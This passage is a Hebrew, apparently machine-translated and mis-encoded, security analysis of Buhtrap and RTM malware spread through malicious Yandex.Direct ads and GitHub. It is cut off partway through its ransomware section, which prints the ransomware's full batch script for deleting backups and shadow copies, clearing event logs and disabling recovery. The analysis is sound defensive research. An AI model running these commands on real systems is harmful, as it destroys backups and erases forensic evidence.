ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct

ื›ื“ื™ ืœืžืงื“ ืจื•ืื™ ื—ืฉื‘ื•ืŸ ื‘ืžืชืงืคืช ืกื™ื™ื‘ืจ, ืืชื” ื™ื›ื•ืœ ืœื”ืฉืชืžืฉ ื‘ืžืกืžื›ื™ ืขื‘ื•ื“ื” ืฉื”ื ืžื—ืคืฉื™ื ื‘ืื™ื ื˜ืจื ื˜. ื–ื” ื‘ืขืจืš ืžื” ืฉืงื‘ื•ืฆืช ืกื™ื™ื‘ืจ ืขืฉืชื” ื‘ืžื”ืœืš ื”ื—ื•ื“ืฉื™ื ื”ืื—ืจื•ื ื™ื, ื•ื”ืคืฆื” ื“ืœืชื•ืช ืื—ื•ืจื™ื•ืช ื™ื“ื•ืขื•ืช. ื‘ื•ืฉื˜ืจืืค ะธ RTM, ื›ืžื• ื’ื ืžื•ืฆืคื ื™ื ื•ืชื•ื›ื ื•ืช ืœื’ื ื™ื‘ืช ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื. ืจื•ื‘ ื”ืžื˜ืจื•ืช ืžืžื•ืงืžื•ืช ื‘ืจื•ืกื™ื”. ื”ืžืชืงืคื” ื‘ื•ืฆืขื” ืขืœ ื™ื“ื™ ืคืจืกื•ื ืคืจืกื•ื ื–ื“ื•ื ื™ ื‘-Yandex.Direct. ืงื•ืจื‘ื ื•ืช ืคื•ื˜ื ืฆื™ืืœื™ื™ื ื”ื•ืคื ื• ืœืืชืจ ืื™ื ื˜ืจื ื˜ ืฉื‘ื• ื”ืชื‘ืงืฉื• ืœื”ื•ืจื™ื“ ืงื•ื‘ืฅ ื–ื“ื•ื ื™ ืฉื”ื•ืกื•ื•ื” ืœืชื‘ื ื™ืช ืžืกืžืš. Yandex ื”ืกื™ืจื” ืืช ื”ืคืจืกื•ื ื”ื–ื“ื•ื ื™ ืœืื—ืจ ื”ืื–ื”ืจื” ืฉืœื ื•.

ืงื•ื“ ื”ืžืงื•ืจ ืฉืœ Buhtrap ื”ื•ื“ืœืฃ ื‘ืื™ื ื˜ืจื ื˜ ื‘ืขื‘ืจ ื›ืš ืฉื›ืœ ืื—ื“ ื™ื›ื•ืœ ืœื”ืฉืชืžืฉ ื‘ื•. ืื™ืŸ ืœื ื• ืžื™ื“ืข ืœื’ื‘ื™ ื–ืžื™ื ื•ืช ืงื•ื“ RTM.

ื‘ืคื•ืกื˜ ื–ื” ื ืกืคืจ ืœื›ื ื›ื™ืฆื“ ื”ืคื™ืฆื• ื”ืชื•ืงืคื™ื ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ื‘ืืžืฆืขื•ืช Yandex.Direct ื•ืื™ืจื—ื• ืื•ืชื” ื‘-GitHub. ื”ืคื•ืกื˜ ื™ืกืชื™ื™ื ื‘ื ื™ืชื•ื— ื˜ื›ื ื™ ืฉืœ ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช.

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct

Buhtrap ื•-RTM ื—ื•ื–ืจื™ื ืœืขื ื™ื™ื ื™ื

ืžื ื’ื ื•ืŸ ื”ืชืคืฉื˜ื•ืช ื•ืงื•ืจื‘ื ื•ืช

ื”ืžื˜ืขื ื™ื ื”ืฉื•ื ื™ื ื”ืžื•ืขื‘ืจื™ื ืœืงื•ืจื‘ื ื•ืช ื—ื•ืœืงื™ื ืžื ื’ื ื•ืŸ ื”ืคืฆื” ืžืฉื•ืชืฃ. ื›ืœ ื”ืงื‘ืฆื™ื ื”ื–ื“ื•ื ื™ื™ื ืฉื ื•ืฆืจื• ืขืœ ื™ื“ื™ ื”ืชื•ืงืคื™ื ื”ื•ื ื—ื• ื‘ืฉื ื™ ืžืื’ืจื™ GitHub ืฉื•ื ื™ื.

ื‘ื“ืจืš ื›ืœืœ, ื”ืžืื’ืจ ื”ื›ื™ืœ ืงื•ื‘ืฅ ื–ื“ื•ื ื™ ืื—ื“ ืœื”ื•ืจื“ื”, ืฉื”ืฉืชื ื” ืœืขืชื™ื ืงืจื•ื‘ื•ืช. ืžื›ื™ื•ื•ืŸ ืฉ-GitHub ืžืืคืฉืจ ืœืš ืœื”ืฆื™ื’ ืืช ื”ื™ืกื˜ื•ืจื™ื™ืช ื”ืฉื™ื ื•ื™ื™ื ื‘ืžืื’ืจ, ืื ื• ื™ื›ื•ืœื™ื ืœืจืื•ืช ืื™ืœื• ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ื”ื•ืคืฆื• ื‘ืžื”ืœืš ืชืงื•ืคื” ืžืกื•ื™ืžืช. ื›ื“ื™ ืœืฉื›ื ืข ืืช ื”ืงื•ืจื‘ืŸ ืœื”ื•ืจื™ื“ ืืช ื”ืงื•ื‘ืฅ ื”ื–ื“ื•ื ื™, ื ืขืฉื” ืฉื™ืžื•ืฉ ื‘ืืชืจ blanki-shabloni24[.]ru, ื”ืžื•ืฆื’ ื‘ืื™ื•ืจ ืœืžืขืœื”.

ืขื™ืฆื•ื‘ ื”ืืชืจ ื•ื›ืœ ืฉืžื•ืช ื”ืงื‘ืฆื™ื ื”ื–ื“ื•ื ื™ื™ื ืžืชื ื”ืœื™ื ื‘ืงื•ื ืกืคื˜ ืื—ื“ - ื˜ืคืกื™ื, ืชื‘ื ื™ื•ืช, ื—ื•ื–ื™ื, ื“ื•ื’ืžืื•ืช ื•ื›ื•'. ื‘ื”ืชื—ืฉื‘ ื‘ื›ืš ืฉื›ื‘ืจ ื‘ืขื‘ืจ ื ืขืฉื” ืฉื™ืžื•ืฉ ื‘ืชื•ื›ื ื•ืช Buhtrap ื•-RTM ื‘ื”ืชืงืคื•ืช ืขืœ ืจื•ืื™ ื—ืฉื‘ื•ืŸ, ื”ื ื—ื ื• ืฉ- ื”ืืกื˜ืจื˜ื’ื™ื” ื‘ืงืžืคื™ื™ืŸ ื”ื—ื“ืฉ ื–ื”ื”. ื”ืฉืืœื” ื”ื™ื—ื™ื“ื” ื”ื™ื ืื™ืš ื”ืงื•ืจื‘ืŸ ื”ื’ื™ืข ืœืืชืจ ื”ืชื•ืงืคื™ื.

ื–ื™ื”ื•ื

ืœืคื—ื•ืช ื›ืžื” ืงื•ืจื‘ื ื•ืช ืคื•ื˜ื ืฆื™ืืœื™ื™ื ืฉื”ื’ื™ืขื• ืœืืชืจ ื–ื” ื ืžืฉื›ื• ืขืœ ื™ื“ื™ ืคืจืกื•ื ื–ื“ื•ื ื™. ืœื”ืœืŸ ื›ืชื•ื‘ืช ืืชืจ ืœื“ื•ื’ืžื”:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ัะบะฐั‡ะฐั‚ัŒ ะฑะปะฐะฝะบ ัั‡ะตั‚ะฐ&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

ื›ืคื™ ืฉื ื™ืชืŸ ืœืจืื•ืช ืžื”ืงื™ืฉื•ืจ, ื”ื‘ืื ืจ ืคื•ืจืกื ื‘ืคื•ืจื•ื ื—ืฉื‘ื•ื ืื•ืช ืœื’ื™ื˜ื™ืžื™ bb.f2[.]kz. ื—ืฉื•ื‘ ืœืฆื™ื™ืŸ ืฉื”ื‘ืื ืจื™ื ื”ื•ืคื™ืขื• ื‘ืืชืจื™ื ืฉื•ื ื™ื, ืœื›ื•ืœื ื”ื™ื” ืื•ืชื• ืžื–ื”ื” ืงืžืคื™ื™ืŸ (blanki_rsya), ื•ืจื•ื‘ื ืงืฉื•ืจื™ื ืœืฉื™ืจื•ืชื™ ื—ืฉื‘ื•ื ืื•ืช ืื• ืกื™ื•ืข ืžืฉืคื˜ื™. ื›ืชื•ื‘ืช ื”ืืชืจ ืžืจืื” ืฉื”ืงื•ืจื‘ืŸ ื”ืคื•ื˜ื ืฆื™ืืœื™ ื”ืฉืชืžืฉ ื‘ื‘ืงืฉื” "ื˜ื•ืคืก ื”ื•ืจื“ืช ื—ืฉื‘ื•ื ื™ืช", ื”ืชื•ืžื›ืช ื‘ื”ืฉืขืจื” ืฉืœื ื• ืœื’ื‘ื™ ื”ืชืงืคื•ืช ืžืžื•ืงื“ื•ืช. ืœื”ืœืŸ ื”ืืชืจื™ื ืฉื‘ื”ื ื”ื•ืคื™ืขื• ื”ื‘ืื ืจื™ื ื•ืฉืื™ืœืชื•ืช ื”ื—ื™ืคื•ืฉ ื”ืžืชืื™ืžื•ืช.

  • ื”ื•ืจื“ืช ื˜ื•ืคืก ื—ืฉื‘ื•ื ื™ืช โ€“ bb.f2[.]kz
  • ื—ื•ื–ื” ืœื“ื•ื’ืžื” - Ipopen[.]ru
  • ื“ื•ื’ืžื” ืœืชืœื•ื ื” ืฉืœ ื‘ืงืฉื” - 77metrov[.]ru
  • ื˜ื•ืคืก ื”ืกื›ื - blank-dogovor-kupli-prodazhi[.]ru
  • ืขืชื™ืจื” ืœื“ื•ื’ืžื” - zen.yandex[.]ru
  • ืชืœื•ื ื” ืœื“ื•ื’ืžื” - yurday[.]ru
  • ื˜ืคืกื™ ื—ื•ื–ื” ืœื“ื•ื’ืžื” โ€“ Regforum[.]ru
  • ื˜ื•ืคืก ื—ื•ื–ื” โ€“ assistentus[.]ru
  • ื”ืกื›ื ื“ื™ืจื” ืœื“ื•ื’ืžื” โ€“ napravah[.]com
  • ื“ื•ื’ืžืื•ืช ืฉืœ ื—ื•ื–ื™ื ืžืฉืคื˜ื™ื™ื - avito[.]ru

ื™ื™ืชื›ืŸ ืฉื”ืืชืจ blanki-shabloni24[.]ru ื”ื•ื’ื“ืจ ืœืขื‘ื•ืจ ื”ืขืจื›ื” ื•ื™ื–ื•ืืœื™ืช ืคืฉื•ื˜ื”. ื‘ื“ืจืš ื›ืœืœ, ืžื•ื“ืขื” ืฉืžืคื ื” ืœืืชืจ ื‘ืขืœ ืžืจืื” ืžืงืฆื•ืขื™ ืขื ืงื™ืฉื•ืจ ืœ-GitHub ืœื ื ืจืื™ืช ื›ืžื• ืžืฉื”ื• ืจืข ื‘ืขืœื™ืœ. ื‘ื ื•ืกืฃ, ื”ืชื•ืงืคื™ื ื”ืขืœื• ืงื‘ืฆื™ื ื–ื“ื•ื ื™ื™ื ืœืžืื’ืจ ืจืง ืœืชืงื•ืคื” ืžื•ื’ื‘ืœืช, ื›ื›ืœ ื”ื ืจืื” ื‘ืžื”ืœืš ื”ืงืžืคื™ื™ืŸ. ืจื•ื‘ ื”ื–ืžืŸ, ืžืื’ืจ GitHub ื”ื›ื™ืœ ืืจื›ื™ื•ืŸ zip ืจื™ืง ืื• ืงื•ื‘ืฅ EXE ืจื™ืง. ืœืคื™ื›ืš, ื”ืชื•ืงืคื™ื ื™ื›ืœื• ืœื”ืคื™ืฅ ืคืจืกื•ื ื‘ืืžืฆืขื•ืช Yandex.Direct ื‘ืืชืจื™ื ืฉืกื‘ื™ืจ ืœื”ื ื™ื— ืฉื‘ื™ืงืจื• ื‘ื”ื ืจื•ืื™ ื—ืฉื‘ื•ืŸ ืฉื”ื’ื™ืขื• ื‘ืชื’ื•ื‘ื” ืœืฉืื™ืœืชื•ืช ื—ื™ืคื•ืฉ ืกืคืฆื™ืคื™ื•ืช.

ืœืื—ืจ ืžื›ืŸ, ื‘ื•ืื• ื ืกืชื›ืœ ืขืœ ื”ืžื˜ืขื ื™ื ื”ืฉื•ื ื™ื ื”ืžื•ืคืฆื™ื ื‘ื“ืจืš ื–ื•.

ื ื™ืชื•ื— ืžื˜ืขืŸ

ื›ืจื•ื ื•ืœื•ื’ื™ื” ืฉืœ ืชืคื•ืฆื”

ื”ืงืžืคื™ื™ืŸ ื”ื–ื“ื•ื ื™ ื”ื—ืœ ื‘ืกื•ืฃ ืื•ืงื˜ื•ื‘ืจ 2018 ื•ื”ื•ื ืคืขื™ืœ ื‘ื–ืžืŸ ื›ืชื™ื‘ืช ืฉื•ืจื•ืช ืืœื”. ืžื›ื™ื•ื•ืŸ ืฉื”ืžืื’ืจ ื›ื•ืœื• ื”ื™ื” ื–ืžื™ืŸ ืœืฆื™ื‘ื•ืจ ื‘-GitHub, ืขืจื›ื ื• ืฆื™ืจ ื–ืžืŸ ืžื“ื•ื™ืง ืฉืœ ื”ื”ืคืฆื” ืฉืœ ืฉืฉ ืžืฉืคื—ื•ืช ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ืฉื•ื ื•ืช (ืจืื” ืื™ื•ืจ ืœืžื˜ื”). ื”ื•ืกืคื ื• ืฉื•ืจื” ื”ืžืฆื™ื’ื” ืžืชื™ ื”ืชื’ืœื” ืงื™ืฉื•ืจ ื”ื‘ืื ืจ, ื›ืคื™ ืฉื ืžื“ื“ ืขืœ ื™ื“ื™ ื˜ืœืžื˜ืจื™ื” ืฉืœ ESET, ืœืฆื•ืจืš ื”ืฉื•ื•ืื” ืขื ื”ื™ืกื˜ื•ืจื™ื™ืช git. ื›ืคื™ ืฉืืชื” ื™ื›ื•ืœ ืœืจืื•ืช, ื–ื” ืžืชืื ื”ื™ื˜ื‘ ืœื–ืžื™ื ื•ืช ื”ืžื˜ืขืŸ ื‘- GitHub. ื ื™ืชืŸ ืœื”ืกื‘ื™ืจ ืืช ื”ืคืขืจ ื‘ืกื•ืฃ ืคื‘ืจื•ืืจ ื‘ื›ืš ืฉืœื ื”ื™ื” ืœื ื• ื—ืœืง ืžื”ื™ืกื˜ื•ืจื™ื™ืช ื”ืฉื™ื ื•ื™ื™ื ื›ื™ ื”ืžืื’ืจ ื”ื•ืกืจ ืž-GitHub ืœืคื ื™ ืฉื”ืฆืœื—ื ื• ืœืงื‘ืœ ืื•ืชื• ื‘ืžืœื•ืื•.

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct
ืื™ื•ืจ 1. ื›ืจื•ื ื•ืœื•ื’ื™ื” ืฉืœ ื”ืชืคืฉื˜ื•ืช ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช.

ืชืขื•ื“ื•ืช ื—ืชื™ืžืช ืงื•ื“

ื”ืงืžืคื™ื™ืŸ ื”ืฉืชืžืฉ ื‘ืžืกืคืจ ืชืขื•ื“ื•ืช. ื—ืœืงื ื”ื•ื—ืชืžื• ืขืœ ื™ื“ื™ ื™ื•ืชืจ ืžืžืฉืคื—ืช ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ืื—ืช, ืžื” ืฉืžืฆื‘ื™ืข ืขื•ื“ ื™ื•ืชืจ ืขืœ ื›ืš ืฉื“ื’ื™ืžื•ืช ืฉื•ื ื•ืช ื”ืฉืชื™ื™ื›ื• ืœืื•ืชื• ืžืกืข ืคืจืกื•ื. ืœืžืจื•ืช ื”ื–ืžื™ื ื•ืช ืฉืœ ื”ืžืคืชื— ื”ืคืจื˜ื™, ื”ืžืคืขื™ืœื™ื ืœื ื—ืชืžื• ื‘ืื•ืคืŸ ืฉื™ื˜ืชื™ ืขืœ ื”ืงื‘ืฆื™ื ื”ื‘ื™ื ืืจื™ื™ื ื•ืœื ื”ืฉืชืžืฉื• ื‘ืžืคืชื— ืขื‘ื•ืจ ื›ืœ ื”ื“ื’ื™ืžื•ืช. ื‘ืกื•ืฃ ืคื‘ืจื•ืืจ 2019, ื”ืชื•ืงืคื™ื ื”ื—ืœื• ืœื™ืฆื•ืจ ื—ืชื™ืžื•ืช ืœื ื—ื•ืงื™ื•ืช ื‘ืืžืฆืขื•ืช ืื™ืฉื•ืจ ื‘ื‘ืขืœื•ืช ื’ื•ื’ืœ, ืฉืขื‘ื•ืจื• ืœื ื”ื™ื” ืœื”ื ื”ืžืคืชื— ื”ืคืจื˜ื™.

ื›ืœ ื”ืื™ืฉื•ืจื™ื ื”ืžืขื•ืจื‘ื™ื ื‘ืžืกืข ื”ืคืจืกื•ื ื•ืžืฉืคื—ื•ืช ื”ืชื•ื›ื ื•ืช ื”ื–ื“ื•ื ื™ื•ืช ืฉืขืœื™ื”ืŸ ื—ื•ืชืžื™ื ืžื•ืคื™ืขื•ืช ื‘ื˜ื‘ืœื” ืœืžื˜ื”.

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct

ื”ืฉืชืžืฉื ื• ื’ื ื‘ืื™ืฉื•ืจื™ ื—ืชื™ืžืช ืงื•ื“ ืืœื” ื›ื“ื™ ืœื™ืฆื•ืจ ืงื™ืฉื•ืจื™ื ืขื ืžืฉืคื—ื•ืช ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ืื—ืจื•ืช. ืขื‘ื•ืจ ืจื•ื‘ ื”ืื™ืฉื•ืจื™ื, ืœื ืžืฆืื ื• ื“ื•ื’ืžืื•ืช ืฉืœื ื”ื•ืคืฆื• ื“ืจืš ืžืื’ืจ GitHub. ืขื ื–ืืช, ืื™ืฉื•ืจ TOV "MARIYA" ืฉื™ืžืฉ ืœื—ืชื™ืžื” ืขืœ ืชื•ื›ื ื•ืช ื–ื“ื•ื ื™ื•ืช ื”ืฉื™ื™ื›ื•ืช ืœ-botnet ื•ื•ืื•ืฆ'ื•ืก, ืชื•ื›ื ื•ืช ืคืจืกื•ื ื•ื›ื•ืจื™ื. ืœื ืกื‘ื™ืจ ืฉืชื•ื›ื ื” ื–ื“ื•ื ื™ืช ื–ื• ืงืฉื•ืจื” ืœืžืกืข ืคืจืกื•ื ื–ื”. ื›ื›ืœ ื”ื ืจืื”, ื”ืชืขื•ื“ื” ื ืจื›ืฉื” ื‘ืจืฉืช ื”ืืคืœื”.

Win32/Filecoder.Buhtrap

ื”ืจื›ื™ื‘ ื”ืจืืฉื•ืŸ ืฉืžืฉืš ืืช ืชืฉื•ืžืช ืœื™ื‘ื ื• ื”ื™ื” ื”-Win32/Filecoder.Buhtrap ืฉื”ืชื’ืœื” ืœืื—ืจื•ื ื”. ื–ื”ื• ืงื•ื‘ืฅ ื‘ื™ื ืืจื™ ืฉืœ Delphi ืฉืœืคืขืžื™ื ืืจื•ื–. ื”ื•ื ื”ื•ืคืฅ ื‘ืขื™ืงืจ ื‘ืคื‘ืจื•ืืจ-ืžืจืฅ 2019. ื”ื•ื ืžืชื ื”ื’ ื›ื™ืื” ืœืชื•ื›ื ืช ื›ื•ืคืจ - ื”ื•ื ืžื—ืคืฉ ื›ื•ื ื ื™ื ืžืงื•ืžื™ื™ื ื•ืชื™ืงื™ื•ืช ืจืฉืช ื•ืžืฆืคื™ืŸ ืืช ื”ืงื‘ืฆื™ื ืฉื”ื•ื ืžื•ืฆื. ื–ื” ืœื ืฆืจื™ืš ื—ื™ื‘ื•ืจ ืœืื™ื ื˜ืจื ื˜ ื›ื“ื™ ืœื”ื™ืคื’ืข ืžื›ื™ื•ื•ืŸ ืฉื”ื•ื ืœื ื™ื•ืฆืจ ืงืฉืจ ืขื ื”ืฉืจืช ื›ื“ื™ ืœืฉืœื•ื— ืžืคืชื—ื•ืช ื”ืฆืคื ื”. ื‘ืžืงื•ื ื–ืืช, ื”ื•ื ืžื•ืกื™ืฃ "ืืกื™ืžื•ืŸ" ืœืกื•ืฃ ื”ื•ื“ืขืช ื”ื›ื•ืคืจ, ื•ืžืฆื™ืข ืœื”ืฉืชืžืฉ ื‘ื“ื•ื"ืœ ืื• ื‘-Bitmessage ื›ื“ื™ ืœื™ืฆื•ืจ ืงืฉืจ ืขื ืžืคืขื™ืœื™ื.

ื›ื“ื™ ืœื”ืฆืคื™ืŸ ื›ืžื” ืฉื™ื•ืชืจ ืžืฉืื‘ื™ื ืจื’ื™ืฉื™ื, Filecoder.Buhtrap ืžืคืขื™ืœ ืฉืจืฉื•ืจ ืฉื ื•ืขื“ ืœื›ื‘ื•ืช ืชื•ื›ื ื•ืช ืžืคืชื— ืฉืขืฉื•ื™ื•ืช ืœื”ื›ื™ืœ ืžื˜ืคืœื™ ืงื‘ืฆื™ื ืคืชื•ื—ื™ื ื”ืžื›ื™ืœื™ื ืžื™ื“ืข ื‘ืขืœ ืขืจืš ืฉืขืœื•ืœ ืœื”ืคืจื™ืข ืœื”ืฆืคื ื”. ืชื”ืœื™ื›ื™ ื”ื™ืขื“ ื”ื ื‘ืขื™ืงืจ ืžืขืจื›ื•ืช ื ื™ื”ื•ืœ ืžืกื“ื™ ื ืชื•ื ื™ื (DBMS). ื‘ื ื•ืกืฃ, Filecoder.Buhtrap ืžื•ื—ืง ืงื•ื‘ืฆื™ ื™ื•ืžืŸ ื•ื’ื™ื‘ื•ื™ื™ื ื›ื“ื™ ืœื”ืงืฉื•ืช ืขืœ ืฉื—ื–ื•ืจ ื”ื ืชื•ื ื™ื. ื›ื“ื™ ืœืขืฉื•ืช ื–ืืช, ื”ืคืขืœ ืืช ืกืงืจื™ืคื˜ ื”ืืฆื•ื•ื” ืœืžื˜ื”.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap ืžืฉืชืžืฉ ื‘ืฉื™ืจื•ืช IP Logger ืžืงื•ื•ืŸ ืœื’ื™ื˜ื™ืžื™ ืฉื ื•ืขื“ ืœืืกื•ืฃ ืžื™ื“ืข ืขืœ ืžื‘ืงืจื™ื ื‘ืืชืจ. ื–ื” ื ื•ืขื“ ืœืขืงื•ื‘ ืื—ืจ ืงื•ืจื‘ื ื•ืช ืฉืœ ืชื•ื›ื ืช ื”ื›ื•ืคืจ, ืฉื”ื™ื ื‘ืื—ืจื™ื•ืช ืฉื•ืจืช ื”ืคืงื•ื“ื”:

mshta.exe "javascript:document.write('');"

ืงื‘ืฆื™ื ืœื”ืฆืคื ื” ื ื‘ื—ืจื™ื ืื ื”ื ืื™ื ื ืชื•ืืžื™ื ืœืฉืœื•ืฉ ืจืฉื™ืžื•ืช ืื™ ื”ื›ืœืœื”. ืจืืฉื™ืช, ืงื‘ืฆื™ื ืขื ื”ืกื™ื•ืžื•ืช ื”ื‘ืื•ืช ืื™ื ื ืžื•ืฆืคื ื™ื: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ื•- .ืขื˜ืœืฃ. ืฉื ื™ืช, ื›ืœ ื”ืงื‘ืฆื™ื ืฉืขื‘ื•ืจื ื”ื ืชื™ื‘ ื”ืžืœื ืžื›ื™ืœ ืžื—ืจื•ื–ื•ืช ืกืคืจื™ื•ืช ืžื”ืจืฉื™ืžื” ืœืžื˜ื” ืื™ื ื ื ื›ืœืœื™ื.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

ืฉืœื™ืฉื™ืช, ื’ื ืฉืžื•ืช ืงื‘ืฆื™ื ืžืกื•ื™ืžื™ื ืื™ื ื ื ื›ืœืœื™ื ื‘ื”ืฆืคื ื”, ื‘ื™ื ื™ื”ื ืฉื ื”ืงื•ื‘ืฅ ืฉืœ ื”ื•ื“ืขืช ื”ื›ื•ืคืจ. ื”ืจืฉื™ืžื” ืžื•ืฆื’ืช ืœื”ืœืŸ. ื‘ืจื•ืจ ืฉื›ืœ ื”ื—ืจื™ื’ื™ื ื”ืœืœื• ื ื•ืขื“ื• ืœืฉืžื•ืจ ืขืœ ื”ืžื›ื•ื ื” ืคื•ืขืœืช, ืืš ืขื ื›ื•ืฉืจ ื ืกื™ืขื” ืžื™ื ื™ืžืœื™.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

ืขืจื›ืช ื”ืฆืคื ืช ืงื‘ืฆื™ื

ืœืื—ืจ ื”ื‘ื™ืฆื•ืข, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืžื™ื™ืฆืจืช ื–ื•ื’ ืžืคืชื—ื•ืช RSA ืฉืœ 512 ืกื™ื‘ื™ื•ืช. ื”ืžืขืจื™ืš ื”ืคืจื˜ื™ (d) ื•ื”ืžื•ื“ื•ืœ (n) ืžื•ืฆืคื ื™ื ืœืื—ืจ ืžื›ืŸ ืขื ืžืคืชื— ืฆื™ื‘ื•ืจื™ ืžืงื•ื“ื“ ืฉืœ 2048 ืกื™ื‘ื™ื•ืช (ืžืขืจื™ืš ืฆื™ื‘ื•ืจื™ ื•ืžื•ื“ื•ืœื•ืก), ืขืžื•ืก ื‘-zlib ื•ืžืงื•ื“ื“ base64. ื”ืงื•ื“ ืฉืื—ืจืื™ ืœื›ืš ืžื•ืฆื’ ื‘ืื™ื•ืจ 2.

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct
ืื™ื•ืจ 2. ืชื•ืฆืื” ืฉืœ ืคื™ืจื•ืง Hex-Rys ืฉืœ ืชื”ืœื™ืš ื™ืฆื™ืจืช ื–ื•ื’ ืžืคืชื—ื•ืช RSA ืฉืœ 512 ืกื™ื‘ื™ื•ืช.

ืœื”ืœืŸ ื“ื•ื’ืžื” ืœื˜ืงืกื˜ ืจื’ื™ืœ ืขื ืžืคืชื— ืคืจื˜ื™ ืฉื ื•ืฆืจ, ืฉื”ื•ื ืืกื™ืžื•ืŸ ื”ืžืฆื•ืจืฃ ืœื”ื•ื“ืขืช ื”ื›ื•ืคืจ.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

ื”ืžืคืชื— ื”ืฆื™ื‘ื•ืจื™ ืฉืœ ื”ืชื•ืงืคื™ื ื ื™ืชืŸ ืœื”ืœืŸ.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

ื”ืงื‘ืฆื™ื ืžื•ืฆืคื ื™ื ื‘ืืžืฆืขื•ืช AES-128-CBC ืขื ืžืคืชื— 256 ืกื™ื‘ื™ื•ืช. ืขื‘ื•ืจ ื›ืœ ืงื•ื‘ืฅ ืžื•ืฆืคืŸ ื ื•ืฆืจ ืžืคืชื— ื—ื“ืฉ ื•ื•ืงื˜ื•ืจ ืืชื—ื•ืœ ื—ื“ืฉ. ืคืจื˜ื™ ื”ืžืคืชื— ืžืชื•ื•ืกืคื™ื ืœืกื•ืฃ ื”ืงื•ื‘ืฅ ื”ืžื•ืฆืคืŸ. ื”ื‘ื” ื ืฉืงื•ืœ ืืช ื”ืคื•ืจืžื˜ ืฉืœ ื”ืงื•ื‘ืฅ ื”ืžื•ืฆืคืŸ.
ืœืงื‘ืฆื™ื ืžื•ืฆืคื ื™ื ื™ืฉ ืืช ื”ื›ื•ืชืจืช ื”ื‘ืื”:

